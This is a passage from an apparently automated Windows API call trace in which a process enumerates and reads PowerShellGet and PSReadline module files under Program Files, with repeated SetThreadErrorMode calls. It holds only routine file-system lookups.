lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.763] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0227.764] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.764] FindClose (in: hFindFile=0x25b73cd23d0 | out: hFindFile=0x25b73cd23d0) returned 1 [0227.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0227.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d260) returned 1 [0227.765] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d340 | out: lpFileInformation=0x653ef8d340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d220) returned 1 [0227.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d2b0) returned 1 [0227.765] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0227.765] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0x653ef8cfc0 | out: lpFindFileData=0x653ef8cfc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1cb0 [0227.765] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0227.766] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0227.767] FindNextFileW (in: hFindFile=0x25b73cd1cb0, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0227.767] FindClose (in: hFindFile=0x25b73cd1cb0 | out: hFindFile=0x25b73cd1cb0) returned 1 [0227.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1e0) returned 1 [0227.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1a0) returned 1 [0227.767] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0227.767] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0227.767] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0227.767] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0227.767] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0227.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0227.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.768] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0227.768] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0db0 [0227.768] FindNextFileW (in: hFindFile=0x25b73cd0db0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.768] FindNextFileW (in: hFindFile=0x25b73cd0db0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x25b73cd0db0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.769] FindClose (in: hFindFile=0x25b73cd0db0 | out: hFindFile=0x25b73cd0db0) returned 1 [0227.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.769] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0227.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d460) returned 1 [0227.769] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d540 | out: lpFileInformation=0x653ef8d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0227.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0227.769] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0227.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d200) returned 1 [0227.769] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x804 [0227.769] GetFileType (hFile=0x804) returned 0x1 [0227.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d170) returned 1 [0227.769] GetFileType (hFile=0x804) returned 0x1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0xac4, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c213724, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c213724*, lpNumberOfBytesRead=0x653ef8d2d8*=0x0, lpOverlapped=0x0) returned 1 [0227.770] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c214120, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c214120*, lpNumberOfBytesRead=0x653ef8d2d8*=0x0, lpOverlapped=0x0) returned 1 [0227.770] CloseHandle (hObject=0x804) returned 1 [0227.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d0c0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cff0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cfb0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d0c0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cff0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cfb0) returned 1 [0227.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d0d0) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d090) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d120) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d050) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d010) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d260) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d220) returned 1 [0227.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d2b0) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1e0) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1a0) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d460) returned 1 [0227.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0227.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0227.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d200) returned 1 [0227.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d170) returned 1 [0227.779] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0227.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d580) returned 1 [0227.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d540) returned 1 [0227.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d5d0) returned 1 [0227.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d500) returned 1 [0227.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4c0) returned 1 [0227.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d570) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4a0) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d570) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4a0) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.803] SetThreadErrorMode 